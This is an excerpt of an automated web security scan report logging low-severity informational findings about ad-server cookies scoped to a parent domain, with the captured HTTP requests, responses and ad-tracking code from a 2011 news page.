document.write('<script src="http://ad.yieldmanager.com/imp?Z=728x90&s=1806342&r=1&_salt=2127245864&u=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-mu
...[SNIP]...
9.13. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=J06575 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUP15EOheQIMp6aIYFMFwqgWKICRGi4LkSGHuoVo77dVqa7OUgcXqUqruxUK6pw26DoqAlJFLZfT4Ux5SbqTCquHuUc/XRFeRyFWPT6EN6ib9rOgornIgakmFz75BmUiSaHo+JZst/oPR9Zq4Tt2uVGJOix55hSkJ3LJKPQI1gnqJcPO+B0wk0qpMSQXyFuCqQpK8r5tYBj/bmtqBKECRDiwMULcazzRzzBdevJ3YZlw1fzc91DujPMvIrU3lBGHD+Oj3GY34vTCgAsALTSPABX9K+qdf26V67jxb2rFhuao8e8wHgc9RUGL1UarXrcKQoVg0O/dT54uSAyDaigAqzmSFzhzgmZT9BJMxPzc4NCP+DgolO7MVTtmzKnuBLvpPBvKHLv25Ok9kGqHBB+5DATvbNCMmEyH/IFwSZOzLes1MyDqRGKgNkRhQbjaoTJLPdtrCZICmiIGgDOjcsfvI7HUAbHc5uDjeMNE0BTWYE73Cg/viOkfNPjdw0BwOKK7W5JcIsu2UEjjN2Zn/OkFtTDweZtF; rtc_dGQ8=MLvntzE1JhpnJ5HLrv64joSEnGpKJDT5hxKcHQSZ6JT8viKgWFC/KkqPtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezrv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxT1XfsCBFwC57YYoJ8dUD0ufXIbI1AwqHU25HskJyoFKznw/sQhMPIHBJ73VP+WsQCcosoyebxnNQyk5bw9Bsr4Ajd4MGQyGjCMZs9RGNNK3gZkDTzt4/z2P/Ssv9/K+M83DKiwjAWi8utGtTdqyGb4IzhNu3lsN08QDZagfgB4l585OsT74yWCR/KejYXQTd4DW18xFu0u1sQaoaWTBOY/Jxq6p5u3FJalMuYrYBWmo4ctB0D/HgTzFFyfS+BUCo8wmacnHn4O/MsiR2LqU0m03bN27yxGajd0JW3dCdPkdZinY1oMQBDI5k5dohjorfehJRmVPiseZIe1egdAPJ2sDRkJZHabCSecm5jjK+CYjNinTqMghBbn4sodp/UCGYsEy7xf7J4OYFvLqndKiTaZQoJcUKc5oyzoKOM7++hWWLcTkob9bgmW9ufD3VkBebI8gJJxHhcKHrWm/eJZhnAjZdYP8LmVqJGER/ulNivQAr1Z9gh1pS4MHtL1CBSQLuxshNTfgm9Qnh83PhCXe6Yvk2VmX7Au4CemkqCTRRfHacCGSXK27rvSN58qKJgVMxMrJq29BzeVX0qGqvzZWmcCYGuyXUAPPKpj0eqmYV3+M63GrKuWMAA8+PbgoD5b7UZmM09hAnd1w2MxukZA3cMw0224znNvYvw3C0g+hDTgcn2mNvmM3NKx69VBxkjkOZxx6XZSBxHuDhwFRo0mFMBl0fKMGrF9xGVp42oFAH1EEod/28MSymYNvCbsfK4npaI+P8SK2x4V96vPHuTLDy/Cx6vHAh+vGlGwUBCANBff9nrluERrS+3Fyfx+Ui+p8hfo8cX2P+ETONPEfu+uP1+RCcG/400DyLJkt2SPTwT9pApTDqP6SZyya0LZzhosQBzN0pTIbzDXEeGOqYZP9VfGtLlYN69+lf/n0KwunQtrPfAR1dQ8puRIko3TButILht14pfWmofo5W0T3geacseWomgQLjLT3uFWX/HXp+K3yYMD+s1qh/O5fZ21itvVvyjurOJNHwPCBFNddUGGdHNUGO1T1Kyo42ZT/kMjgqiVSPrh+V27aJE522u9E5Uuvj48++J9zk0HAF4MP8pbMoeaq1U3zJHDdejn5X/BXm+thzK+Rj0hfGndyks5pZb2IvqvIrRO+Jh9lMW0WRh3MqKF/QUxLA0DV9lTInWhVKKDHCLf9B+Vr8d64IvjJ1SaxZM731RZxyn8HrvU6mZZo5hMLOYr95YzEFr9ZgdqU00kw90WgDPabslCoBnR8vLiP2BaVC7rX6eFBOv1ASiKQM9hdr0/ut12g3n8MYbIDtI7ghXyI31mAtBtWKqCrPU/eor48rAdH+FDHc8bvtoW73rj1Tpdq4/+oeY7fdYQjg3DsXB1bJFC2aHnkmzrR3l28WWFHb9D/32f+BBQA; rsiPus_wuF1="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8aleSaGIyXRDs4FkB8sFCZuw+T+165hyVBVJdSmUgvaZFUEgQ++TCUEHmPCzXDcHU3/q71ALbK2PSrJN+jB0Gcwa4UhPEVrUN6TcHwqPWgepSOQrGAM308YkJ9Kue16ot0nIp6qAd3oiL1vu8ImerbnCX9fr9JwgYkrBhGapemCFDjspZk1rtEaWVVb/SLwdVTkAbzsNzSnzwc5wGCa8jVcpLL1HEVmqAjL5TwOMK3qCqjZRxHhcVoCO32Vm2a4+oGoVsu6f5cdmr702F+fO8bJ0zUZTlrWdNQF76rVKVigm4I2aRP1upzq3Xa844B3rJfxR7kbIeqiNcOFqKbSbO0FyTBJmabs/5OGsVm8MzaWv8XDRsNoP6aqXleVpyBBYMCmndtzdvmN0PX2PGTSEgHhHEOXIef+hyFlWIYJXhKyB1GZ1nN2HxLnlweSc/bw47BG+TDLVioZi40WnLGVk5Z4CwWDF0HwdzaazFGEJnNpjYIdAXTH/lTD8va6y4gx9mPASTJgNc22xlesGWI7OxZl1lqQ7HaLFB1HNYBtc5bP7IeCvhsYBGZg7cviKgAqSA9rxV77UbSt7TCcEyrrWjO+3NEalTV9bExjEijsonVl1qiCkFcvi4aTfn0Xp29/bqHk9TGMy+VTExoryi89XrlvZChiv8aCqD5nn1swwyeI8WXt6PokJinNDm627rLE7xLD9GZAmT4EC6DnSNF66FJKT8gRriX0keP+ld6zjtUeyx5jDTsazJK/T22dm7i42KiJZZ+f3mfdl1R07uyRQ6zBPxN70+SfMEN0VDs+0K+P2dhEnHBFEMNjU7Q45KqoSl8BK7apDExjVxjQh+dsxHVzgaFZsZaqXyOVXEIOp8oSNlzyOlBEIL/wfuQMfqNOFtMORF41x2ag+MOqOOgTOdugSJ08l6FYGH5XPnZQcM6Qwefavxgc9IzEXOoF0bdiHi8Phz+D5O/sUnh+KES8fiVsIqDkgN/d4VXR+Bqtve+rF1K2Zq3A=="; rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpn7P+LBAm++DA1mQ19Ktk0xHsNbUdnssfo0Gg2GtNOjezP3rQsX+ieC4o2fHI9QkQeov8FSjRptD7ENVbUid4nnMJw2upjcbtYuTDvN446ehF3GgXLLZTbonI4jYrOBasvRFfMnkE53wY4Qa+hKdx6gukgA/85R9jXhtGV7/piYr5YQZgjMiKl8zWjUoD0F3UhqKyr9Id97BfRNHCeDUiGyQYV3IR679d+6Fpy0gp1Hq2XjxlJKDOqjAs1Uw1dudiAIQw7rizeuLD3XUC+e/mDTPH7BnVmGnFlHpoxfT7YsL0wt1TCMgGvoSIbnMIU57JYoUftomTxWnNTVj2NzOwDjpZIg48YPTnIgihnfbJxlqTqbhkTFxz+dV3nEMImFBKzd64qvE1zt38WPal3ooNbYqY4hIZWj8N4pKHLwHPyWzs/CsI6rWRhrWMPRaUafMfQn/v0U75IJgD8TGuloOwC16CAbvKgsBHdSES2thl/yLffPkkgsVchivYvx1DIgzI+Hp2cwp15/JafWYD1uqtnSaqyiY5cSyX1S9pZYVMWf8I99X0PmkHmiE+AmJ2pOIUjqqv8lHsXuUlO5LZo1crEog7F/asoNmA7+b1HAp4GyFPw8IccpCRD55tkYzvfpalmWhSIak/31maiBYBGTGdMPAhhPIWehJXnhsO0s79zhTvo+mhSTEb31vIjsG19H8uhSlb70Xz/RdUHnSSFQu2fn9OoA0ULdTsbgEYRNxte1+V4Vu5pclZS/SluGYRGqFciUTHH7jlTzS7r4Od1PDbqHOXOoGhgdQKRwlGytvhlJ3xpN38TeBBvuSli78zJal5w2RgiXvdzsle4GypMSBJTlBFpkLcvXbok3eHAtIL39rfw/UIu83ImxrDg6smRtaoCYqy6FrPvEOZvbHeZKJ1G6PoYEXV8RC7c5ut/7o1FJqaAV9fv+dLKW/LayYdfhFv6v33uPJSN5cTsetqde/n2tODUxKQxVKARJrsoIbuTvqK0rkezL0LMNB5mMi30PtNyanRSr/WUuwQZpJ60S6tI3fUgKWeajoXdlSIz4FFghQ9I+YJhmXQ9IxhQqDK+BwrtqJ+G/7aCwcyCBYmRkfHJc/Flc9ttNYB8QLSGHHxZcNV7DJc5sT00OUsUVmrKDXWc+nRcX1WiQ/VkP0PS/bC1/DbhNecPWVRE0AXkOh/IOoVf06+8SOgC8Ev3jO0RbucQa8aazOvezkk7zeyQCkyl2Mc4X9xCgxUsXK9DtZSCJK6m2R/mQCTbaItUg3/6EIcy8zL2Scsdi6aQPsU9UrkfVegfH0Uty3GkCV77GW5oseV6DHz9+RNhUmepmjvJu5cKj0grDAv9MP790ikGiL9Vbfl+2hPsPfIsGhjWXsvCaPLDLnnlLu7s6jCtbDAg+6/AWwustsHfWZNO9mP2B2hNB72eXivVKC3ScCpTMJq/yXGNl7gyrzILPyfzvctlhE7tAAL1KCRqQVBYdg=="; udm_0=MLv39SEpLipv597JcdnUygV6rsvwpilMo4IXeAwquaRyre3gpPYIVAodYIp/pLDnrZ6pzwptsA0XKpUy7HBRG1IKyMiEh4VBn8RQKgHt6xmexyTANa3oP9nI5ve4Zh+cFpisilatsARekr/e1VTo6CfrY9ZOrKU59rPLHnZc0mKVcQ44RykdTAno/P8W1VY/OF5riAyTBWbBY+xYNSljIWcWOOtopIN1ZjQYZDMkgv8oJAkIGrSPg7YITZqDkGM+V0BX4IQvQU/ry0FVeR/RwM2R8eN2xwK8bXMaT8dnyGWiIwmFneP0q3borhBG+xrCFLFiU6qVr79K4V6YQuPzNuqA4/90ta/9VnFUEqhNTnmt1DrgJQOF4r1UEghYGiGgL7M7jrwbHJw9+F3CxjGnvmdNCsiiHDRDAMc/vfIfy1xA8L7rohMERi0dIDuvhqOPWEsI6+gjuwkRt93TDz/gwRoH3pOiO65cSq0JPJXL/eJxXICyA8Awu1c665ElpIHf+S2JzUt2IfmG6UqU7nNeIE7CqJ8wxwMGrI48La943kqanih8S8EHg93VfGjHcj2k0UdI+MOO5SUZtq0HZasWtuROl2/v/L3k3VhfBWMD9MKywUA3DZbUUdwgNu+Bc1D5GVtD/DFSVzHQd+Kthaux21W1VpYQzrJIOJqcfN+uFcepRaoHI2S6F+4MuQoZFMlFeSdfgpOqfSyBUa/S4SRDd2WkicgTYEf8w14nUrumB9cXOOs8IXQ3zkExOY2ILoGKzpi3VyhWA/E7FCSpV8XPeJUC3cephnvWTBkMkrOSNt+1c2G2kN2jJJu+t0Axdqd+gORvzH+Vh/dfmgaAk/YEKClysvExNZvw7tZ83xSC4kxPGUztLFNur6xF7/1lfGbJhpEOwNHvrxxdmXquPa98rGNTJlGE2KuHf96OXfa2fRUSFFdVEch+rdebr5A6GR+T8gEKpv5c/Kj/cUWy28+9cyQtHhLIz7E3JHVNRa1Iit99TBeVrjSUCEBciFZMwaQsrMtGEShvcBgNIKjzOM2bjkPTGk7U3NF9wbb7lKjRgR1a3vT+ePnQqbS+geKekpy0pYHIXkAz8rK/hMKwUUVuz/Sh6MkM2MO3MrV3kkzTtTQNj9q5xFCbt/phR+QzLH9cUhyOm+dQbNmQgiBz650QmznHkzThdkQ9qDa45Zs0ktlIz+ebUsOdl2IUiON4g2mdMKt5PQc62vmcGDUwYCvjBlm1gYSd9xvPi0tU6D3XX+oxjCU/9wnHCjGC8Y9JmhiMEF8QUbZgTzlV7IJD76HT9mUVgokd9gxAOQ==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_wuF1=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wuF1=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_dJdc="MLsXrqMOJjhroJB0OsFGPzgTQa5gk449UdSbypMOpdiJuQ8uZnyT6WZcebgrPoqwK7j54RnOdugyEJFu1u1/kxt/eHbh4iCmvSB8fik1JCbILFQwNyRB3XmZYv61AYwLDVmz3VsSmUe+fB+yP8yzNYmzFkyZrPC7z9K8YXjI963e66jPe6k/CoS4z8uWeuITGVaJoW3ZWbeBoDt2e9DmCkwiTsAu8BSlsvzgbzl9X0CKuQcYs+2vGi8KyNxZlNV/O3vQvk2KoKo/gmQnrkZg2FK0VOC45kZgVoz4gqDmiTyD6LoDLxOtAteOd0oEU38dx/0UsrqqyV8FwUnzTGiXEWBNzCaQoJc5yD4ZBJ2IbZ3w+GMFlCaS4bFeiqD5Uu4WrIJFgGCIP1V8l/sjUmvXF7kq6Ts+fyjsBk8zboXi5TdzKE7BIFHru2Tv6T88c6O9VWmg/5AxIK7ZKXryudYKYivLEGZ0ftIYIZG7USvwpiNwby3j026bB7RioZiokWlLyPwo5+CAeC/0sx5hYexS13hnRwPMINg/iiRl37OsbwyWSVpmLt6GJ0ueM3/lqli6ISMYnX9lmLUtaBXaM3ygtFwr7OJR6iahiQA2mImPSvkfiBKekT+Is7a1kjqDoqOb1KCZYp9TiGwkKq3V7Oo6VzUL6X5MPem9oO0siqzO7PmC3dykx69lQmZU6zoNGApOTsoKL9DwBEsoqNkIh4aXsB2Ygp6ipLHeMjuUE2wQpST5bYoHySP93cix8e8Gb5lV5F0zi2fBN33pN0Z4lGISYgAURmRYWoMLNIT6wwrGEZwT3tYqTQrQNx8wv38HHv0hwPiUL8IhJAd9OePqfNTjyQgaR2VZaa/rcO15+AuggRh/VXH0/vUEp8zDk1/b87FqYm7vacQYgw0jh70VRYurH4PuecWUEnVerH0qcfc4YqB/gbVhMFFF84FMttNg1o/KQK8Xuar8A4OQ5KildhHirlMV6qQghu5Om+C5gLROQlAjyIhuheNySsXz3FFVpZmVI0j1PyhkQwl8vDaYyqa3sE+32CR8"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpj7P+LBAm++DA1mQ19Ktk0xHtNbUdnsuhledavN12kASJwVH5lHOqeC4o2fHI9QkQeov8FSjRptD7ENTZzS+tm+o7g1+4q2ipO6FebBr4lX9JqakD06xSknvL52fJuOnqMnmUVtbZDezFLZDkQ9/DOcJVmus0zFa8R4eGBZWoP51vdnmVwXUWy2AzzrS3LC/KeUSBZa17NuW8wA7lJfNqWQdNV06Z479d+6FpyKgl1Hq2XjxlJ1jOqjAs1WA1dOdiAIQwLbq3YvJx3XUC+e/mDTPH7BnVmGnFlHpoxfT7YsL1wdlfCMgFvoSIbnMIU57JYoUftImTxWnNTVj2NzOwDjpZIg48YPTnIgihnfbJxlqTqbhkTFxz+dV3nELrmFh+jD84pvE1zt38WPal3ooNbYubn6Gn6tNGszfofAmyosRDfqsN6xGEQBrpVuB7EfC1mMrWQQm07FAtrYhxV9jQPwF8aAzKS57OagwgoEgSWJac4EL43S44ef75AQMhog8R/Pbu0AqaCZyqSzfFJo37W/WnSakK60MhraaUHbB845TFfFuKnF6d1KnlacwSiwYA4zSViHcP6ulEzTa2oAJJBpaf86mV/36OOxQ0C06BBrl3U3FaMUccpgDS4Q6g85h8LjjPuJ5HD9lRQdGnciFJst2iIODuspDiNNQn53F37Ivg6K3BHkEYUvP8DjelaXuskVdPwcX2N1TfClGnCAS6cYQQECmKkEoV2Ty5ma1uCIeUwK/N0b9Nw80EpBMjmz2PF81rbW1LZR8Yrr50OIbx0E38b3QIYtaiQ2HH5TaVYZ38N5Be6eCj5Q7QpcoPj5ERI0sgXD6QKCSwduWmd0RV+fSV2TkbCTv+pnupeZ/EjnilqyR2yvHw6RMR0Bq3qEoPosr7iZUc//XDs7ZXY9WWcbNbUCrAvKfBaQrg0Vc6Qi97aI3G1N/kNvNpKTN/23K8u93rljutE4/CsbGAj8f7WMmbTOIMjkFV+rmcEcrgDHUZj8EV4wcvuoVrfNQkocxZzCkctye0KoRoJIKX5KRQqqUzeq06HfHZGcVhuvF3BKdMM/Fjmsszs9H6zArVaijt0fVauRh7dBVBdULPsaJ7riVOn6Uwy3fpnD9ux5E9H7qsEK1h7fbJO18nv26wKJ7YWZM5gXP2LEWHxvabbxbwwGJ1QlIMhDB0OoWtqmjDKiV9MuMnamXFEGet8G/CDst1gkpmYPuG6pBgUPehivSI0fOzA0wV/YCP9qYhrYyEalVKutJsu2eWT6Je8BzKdDq10UjW6IpkVn4Go3iH0RzBFoGh24tA44C3aKTJa/2frujwGy2nzvvlF0sL6Rj1PGg46xmLjjXk4TjthW0D/I+k61vl+3uQyzZb33wWkGruFU4eK51kxOG6IX6C3L2EZAPZFpFvij+HpKJotZx5w6ko9LWWaFIAAC2R/IHJ1W5UMBBCdaqSbYc7M/Frlfg0k+l6JH8QfxsE/FY8E"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:42 GMT
Content-Length: 1315

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...
9.14. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1274605-56918-315889-715901-1023315-725071-1268392-1198035-1049794-1238051-75921-74560-593881-1264419-86237-926097-1006089-1196051-1147048-1086731-1284585-1086733-1044410-1093100-1063912-397181-1044578-1063916-1041270-1049769-1049770-596293-576685-596291-1044587-1049772-1063911-1063910 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoymsoZetPIFP0ffNDfMLjjNFIzKlvZuUgbFfaFOL6AbG7GUvAjTSSs+fN0pT1Ek1A1O3Uawg8CYDi1iW8H0kygALN2qJ+ws9ZOH3ugpCLaZ5feHz0JxquchN2/rq+HLLuOZ0VKwgyhnjOvVX8lAqNNGQnydj1ObQFnZ3eyoEiP2frlPEGSBPv7VbJ1gOdXtavZhpvWa4MynECuel295hxlggN5joS+oH68R/BvNNYxTBk/8bUbqkGRIF2YopY8aJfkRkxg7A==; rtc_Wdkl=MLvn9zU1JwprpgZts8KQPOfaDcghJRY/syRG3WmM3le4ahJ60DTLD9+eQw9TOWi3mDGoGjklUGHxoEY411AnlDFR7yxZ8S+5rurGG9f9pKwr4QIY3riFWwRW2/4Pe6fIj9pfpVEFteudvD/rxinl01fHUDRopiXl3GV8QG4osgcIGNdQx253r5pJdcwR9YNyu0DNQTJxMId3nnJVUuDBpShinKA4tGa1cJ5+Hi2h59O3EJ9kKg9GI5OyNT9anWrXE6ywNFSU8AW4cLbauLlR5eS2CLmnPIYYHKESl6oWWm0MTZXo6HvTRjOh3Kxjjr71vvRTm7L5Tz/0AbnlXpfN5o3CS5RjdMCB3pJQ2xQbBI3eRje/yubp9KxdtHOub8fTM28fZtJ4Ff2evOSytK6+rguHT8qBsX3nAF+4suLuuzKXbljxXplpid99mfevz1NlGM1rlme7TFJHFw4T1WuGDkF0/Bw+17f4hzOZ89iGWZOwrinriMKVgfY7jgoThgi2LCqlToo4fv3BlxJBfv516scfvSGQii09J+OKaow2IMFHec2le5u592GGLOoNfhzh0wpAqny0dXMRunGZyuZpmgLUxyUcKEwjHtT4X/AWCCCKORS/JMUrvxw3RAPJ6tF7CPQVmN7vqfcMGol2PIwqma6LxPH616WqLSzSnYgrsHT0TROIWZVFqnuaJM072T0MT5VgEjbfrOrd4LflERbjcTxSI2oeuTXiK4/DDbsMpXxVYN1Y2+usrIA2tC4YKZcBieXRepuUWczdfoZq+FnW2fy54+8Ahj2DVr9lOeaPFz2YdxRA1DSkZ4p5j9nptFqVYRp7FQzd3L/rYbDcNwxsgNzSO1d/3MsEpZ+u6l/tYp6235d2EPF1lJvs+eY9ItWr2vywljErTzIjlFHOn3/vKN1lEO73a0MbZqAdadvoFSbLJ0FvE19rnlZr+jLJUArQXcyjG6qIfxe/x1qg9xSiD31RT940BPPNPFuSB3jU1xCgzxdwZN+cLq4+t59GjXdlNZMYlZEgjb2U0xa8rhgytOKQKj8cmLxuSqaEZ+rWPzIohHg8f7s/uwKkvXH7iStjrfLqN0iCTEktKJXa/EwxS3z/MCvPn1r/idkifyjhHKEVC9C8zVl28Q/obJ7v8A4+p79u6ECvoWawsZnxyX2Sk6D9FNVYNlOJvedTMFsJwjXTr5IfjCyqZk/UBqwFopBNsF8mpjRgy0jItxUL6s4Q7hJdKlt00izGkWFGjIaDJ5kgZqTbls7bo0uCnBhS0EivUGf5It9R036YZRZQhxLAMohm4BfvheaScBd0B6LD+dTsBOvBZt9qi8tKiSbAaWZAZG0kSm+xaQ8kjECVabgciinTfHRfdpcUgspdFtG/gYEj/BGsLUEDEDI7RiOCgIHqoGp9U8cm+NPOB87TWiP0V9cm6dG/MoQEGnmIEcpVMkMbUqQQPupK8MsZQ14dKvTqSRi8zQdNUKGRl/VBOD0x4AipEdvfcRFT77t0mzC0MtmgixiyT97l2MWc7nrXw+dbSqjkDo/V3VevRKGZiARbawBaubiTK1iTZ5X/QPG06n9m/GdUjFWTiJTeUtEsWyR/00AFRQ1ar060riKgW0WNe5vm1v/hmD2/AqXENoELyR0vXiP4im0//qAix0JrmEcuVRVnuzsHTORwkiEWyF8n88lfFjkZL4mXL6Ur0sWd4e2vaJRwp8A=; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39SEpbjpv597JcdnUBu4MHEenRCd8VPQOZXj35OaFc5qnI8MKCuGnn1SBN3Wnlqzb1/yfNaxCbp9btShq6NvtHJWkO5yz1lh5l92l+unpO8a62HEC0Ow3WsLVWsQO/LH6+aoOEKzXH626/J57yCfXh/SJ94hwXC0dfP558ntGi+TU3NFRXHYa8+u6SoZXLSsbbKVaGlLBJWNm8hDUZzQqCt6nJiWA5uBufndLwp+daMTDTfyoG0u88UrfSLKLtUwmK9Nc4+z6EEtp+jVizB4mNweBK4+LPHOgz7mIIN1zEXOuNDS2M3fG45TcRhoFUg7VUoH4CrMwF5Hpm1b9QGhYTjezLcjOEtLIYizka+GxtFQp+VpovDwshk/5DWsqucfelZBHOq6PNkU4W0j0xbqkwPek+ROrQddfTZv1pNfgRSYxFVvPYmCb4nrJkE6/Peg3SlGFEn9/rySzxBikRJmE3/M+lcGEQtcTVk6XNz4n/DcRuhSFd65APv6NbKeC0HI6lNEUNzL+w64Hg+pG4olOwauUJwKqznmt+LB5rRjeluO8lSlvSBWQGVjhFm+gIpo9t+Yxqi4Z6uY0wSPgV8rTfN48XfW9RTj7ci2zEgmrOn1sN6QxSV7zb2x9cF1Mg+BA9sVQEMOsTWxmc+20Gr2V6H9VMFkU2ChzWlllS1boIRa3E/f1sBgqwD6TvxrYAvRkVVeal/ThwkU0nX8scPQiZzAqIs3IeNjBUiNOMadIxaU9pT5zdkTfaCQLjbTqbQPN35UFLAQBoj8ANYBC749UUW3BXFOcvPiv+T4YmYn9O9+lruitAIYyG9TQLPJnVSINqWfDptNc1BkY+p2mgA00NHBRERyw0E6NiPaBaltF6a56LYEXqfbbF/Gu4Wf77t5UCPm1daS12CqLzhf91ykW8SLmb14HhEZ6jZGGvdPljDhV/m9VoiyOCYbeLW/aUAcz5LJUBeoWHNBb7NaLvlgsIj4LI51awNXjRD4dphanGc82HIPY364YbduxCjYn3qTfpSrm/exLtSUxnAbQn4cG/qOec4i7XuuCoaWMrKMGX/I+uCJ2q7C2N0bVCkMZBSEVEEshLUVLQ9TcCpEo72HPSAWY9AgCPz+RdghUBRpyOB9CmRHKmYe5kupGqYYAY8zLxVOdDQPO95g4jYDw856TtCNHODN+d10UHIyZRtWfFpavvlcymO88CcT4BmFmzB